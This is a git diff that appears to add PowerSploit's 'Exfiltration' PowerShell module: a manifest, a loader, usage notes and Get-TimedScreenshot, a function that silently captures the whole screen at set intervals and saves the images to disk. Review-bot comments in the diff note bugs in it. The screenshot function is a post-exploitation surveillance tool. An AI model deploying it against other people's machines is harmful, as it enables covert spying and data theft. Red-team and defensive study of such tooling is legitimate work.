Diffstat (limited to 'Exfiltration')
| -rw-r--r-- | Exfiltration/Exfiltration.psd1 | 87 | ||||
| -rw-r--r-- | Exfiltration/Exfiltration.psm1 | 1 | ||||
| -rw-r--r-- | Exfiltration/Get-TimedScreenshot.ps1 | 99 | ||||
| -rw-r--r-- | Exfiltration/Usage.md | 12 | 
4 files changed, 199 insertions, 0 deletions
| diff --git a/Exfiltration/Exfiltration.psd1 b/Exfiltration/Exfiltration.psd1
new file mode 100644
index 0000000..7eb9aa2
--- /dev/null
+++ b/Exfiltration/Exfiltration.psd1
@@ -0,0 +1,87 @@
+@{
 +
 +# Script module or binary module file associated with this manifest.
 +ModuleToProcess = 'Exfiltration.psm1'
 +
 +# Version number of this module.
 +ModuleVersion = '1.0.0.0'
 +
 +# ID used to uniquely identify this module
 +GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'
 +
 +# Author of this module
 +Author = 'Matthew Graeber'
 +
 +# Company or vendor of this module
 +CompanyName = ''
 +
 +# Copyright statement for this module
 +Copyright = 'BSD 3-Clause'
 +
 +# Description of the functionality provided by this module
 +Description = 'PowerSploit Exfiltration Module'
 +
 +# Minimum version of the Windows PowerShell engine required by this module
 +PowerShellVersion = '2.0'
 +
 +# Name of the Windows PowerShell host required by this module
 +# PowerShellHostName = ''
 +
 +# Minimum version of the Windows PowerShell host required by this module
 +# PowerShellHostVersion = ''
 +
 +# Minimum version of the .NET Framework required by this module
 +# DotNetFrameworkVersion = ''
 +
 +# Minimum version of the common language runtime (CLR) required by this module
 +# CLRVersion = ''
 +
 +# Processor architecture (None, X86, Amd64) required by this module
 +# ProcessorArchitecture = ''
 +
 +# Modules that must be imported into the global environment prior to importing this module
 +# RequiredModules = @()
 +
 +# Assemblies that must be loaded prior to importing this module
 +# RequiredAssemblies = @()
 +
 +# Script files (.ps1) that are run in the caller's environment prior to importing this module.
 +# ScriptsToProcess = ''
 +
 +# Type files (.ps1xml) to be loaded when importing this module
 +# TypesToProcess = @()
 +
 +# Format files (.ps1xml) to be loaded when importing this module
 +# FormatsToProcess = @()
 +
 +# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
 +# NestedModules = @()
 +
 +# Functions to export from this module
 +FunctionsToExport = '*'
 +
 +# Cmdlets to export from this module
 +CmdletsToExport = '*'
 +
 +# Variables to export from this module
 +VariablesToExport = ''
 +
 +# Aliases to export from this module
 +AliasesToExport = ''
 +
 +# List of all modules packaged with this module.
 +ModuleList = @(@{ModuleName = 'Exfiltration'; ModuleVersion = '1.0.0.0'; GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'})
 +
 +# List of all files packaged with this module
 +FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Usage.md'
 +
 +# Private data to pass to the module specified in RootModule/ModuleToProcess
 +# PrivateData = ''
 +
 +# HelpInfo URI of this module
 +# HelpInfoURI = ''
 +
 +# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
 +# DefaultCommandPrefix = ''
 +
 +}
\ No newline at end of file
diff --git a/Exfiltration/Exfiltration.psm1 b/Exfiltration/Exfiltration.psm1
new file mode 100644
index 0000000..e5234fb
--- /dev/null
+++ b/Exfiltration/Exfiltration.psm1
@@ -0,0 +1 @@
+Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
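Review bot: The one-line loader dot-sources every `*.ps1` that happens to sit in the module folder, so any script placed in that directory runs in the importing session, and with `FunctionsToExport = '*'` in the manifest whatever it defines is exported as well. Naming the files explicitly, e.g. `. (Join-Path $PSScriptRoot 'Get-TimedScreenshot.ps1')`, and setting `FunctionsToExport = 'Get-TimedScreenshot'` in Exfiltration.psd1 would keep the module's surface fixed and reviewable. A short comment above the loader stating that it executes the listed scripts in the caller's scope would also help readers of the module.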
\ No newline at end of file
diff --git a/Exfiltration/Get-TimedScreenshot.ps1 b/Exfiltration/Get-TimedScreenshot.ps1
new file mode 100644
index 0000000..3a19a7d
--- /dev/null
+++ b/Exfiltration/Get-TimedScreenshot.ps1
@@ -0,0 +1,99 @@
+Function Get-TimedScreenshot {
 +<#
 +.SYNOPSIS
 + 
 +    Get-TimedScreenshot
 +    
 +    Author: Chris Campbell (@obscuresec)
 +    License: BSD 3-Clause
 +    
 +.DESCRIPTION
 +
 +    A function that takes screenshots and saves them to a folder.
 +
 +.PARAMETER $Path
 +
 +    Specifies the folder path.
 +    
 +.PARAMETER $Interval
 +    
 +    Specifies the interval in seconds between taking screenshots.
 +
 +.PARAMETER $EndTime
 +
 +    Specifies when the script should stop running in the format HH-MM 
 +
 +.EXAMPLE 
 +
 +    PS C:\> Get-TimedScreenshot -Path c:\temp\ -Interval 30 -EndTime 14:00 
 + 
 +.LINK
 +
 +    http://obscuresecurity.blogspot.com/2013/01/Get-TimedScreenshot.html
 +    https://github.com/obscuresec/random/blob/master/Get-TimedScreenshot
 +
 +#>
 +
 +    [CmdletBinding()] Param(
 +            [Parameter(Mandatory=$True)]             
 +            [ValidateScript({Test-Path -Path $_ })]
 +            [string] $Path, 
 +
 +            [Parameter(Mandatory=$True)]             
 +            [int32] $Interval,
 +
 +            [Parameter(Mandatory=$True)]             
 +            [string] $EndTime    
 +            )
 +    
 +        #Define helper function that generates and saves screenshot
 +        Function GenScreenshot {
 +           $ScreenBounds = [Windows.Forms.SystemInformation]::VirtualScreen
 +           $ScreenshotObject = New-Object Drawing.Bitmap $ScreenBounds.Width, $ScreenBounds.Height
 +           $DrawingGraphics = [Drawing.Graphics]::FromImage($ScreenshotObject)
 +           $DrawingGraphics.CopyFromScreen( $ScreenBounds.Location, [Drawing.Point]::Empty, $ScreenBounds.Size)
 +           $DrawingGraphics.Dispose()
 +           $ScreenshotObject.Save($FilePath)
 +           $ScreenshotObject.Dispose()
 +        }
 +
 +        Try {
 +            
 +            #load required assembly
 +            Add-Type -Assembly System.Windows.Forms            
 +
 +            Do {
 +                #get the current time and build the filename from it
 +                $Time = (Get-Date)
 +                
 +                [string] $FileName = "$($Time.Month)"
 +                $FileName += '-'
 +                $FileName += "$($Time.Day)" 
 +                $FileName += '-'
 +                $FileName += "$($Time.Year)"
 +                $FileName += '-'
 +                $FileName += "$($Time.Hour)"
 +                $FileName += '-'
 +                $FileName += "$($Time.Minute)"
 +                $FileName += '-'
 +                $FileName += "$($Time.Second)"
 +                $FileName += '.png'
 +            
 +                #use join-path to add path to filename
 +                [string] $FilePath = (Join-Path $Path $FileName)
 +
 +                #run screenshot function
 +                GenScreenshot
 +                
 +                Write-Verbose "Saved screenshot to $FilePath. Sleeping for $Interval seconds"
 +
 +                Start-Sleep -Seconds $Interval
 +            }
 +
 +            #note that this will run once regardless if the specified time as passed
 +            While ((Get-Date -Format HH:%m) -lt $EndTime)
 +        }
 +
 +       Catch {Write-Warning "$Error[0].ToString() + $Error[0].InvocationInfo.PositionMessage"}
 +
 +}
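Review bot: The `While ((Get-Date -Format HH:%m) -lt $EndTime)` condition compares two strings, and `%m` does not zero-pad the minute, so a current time rendered as `14:5` can sort after an `-EndTime` of `14:30` and end the loop earlier than requested. `$EndTime` is also never validated, and the help text documents it as HH-MM while the example passes `14:00`. Parsing it once before the loop, e.g. `$End = [DateTime]::ParseExact($EndTime, 'HH:mm', $null)`, and testing `While ((Get-Date) -lt $End)` would make the bound explicit and reject malformed input. Separately, in the `Catch` block the string `"$Error[0].ToString() + ..."` expands the whole `$Error` collection and leaves `[0].ToString()` as literal text; `Write-Warning "$($_.Exception.Message) $($_.InvocationInfo.PositionMessage)"` would report the caught error itself. The `.PARAMETER $Path` help entries should drop the `$` so Get-Help can match them to the parameters.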
\ No newline at end of file
diff --git a/Exfiltration/Usage.md b/Exfiltration/Usage.md
new file mode 100644
index 0000000..dfdaabb
--- /dev/null
+++ b/Exfiltration/Usage.md
@@ -0,0 +1,12 @@
+To install this module, drop the entire Exfiltration folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
 +
 +The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
 +The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
 +
 +To use the module, type `Import-Module Exfiltration`
 +
 +To see the commands imported, type `Get-Command -Module Exfiltration`
 +
 +For help on each individual command, Get-Help is your friend.
 +
 +Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
\ No newline at end of file |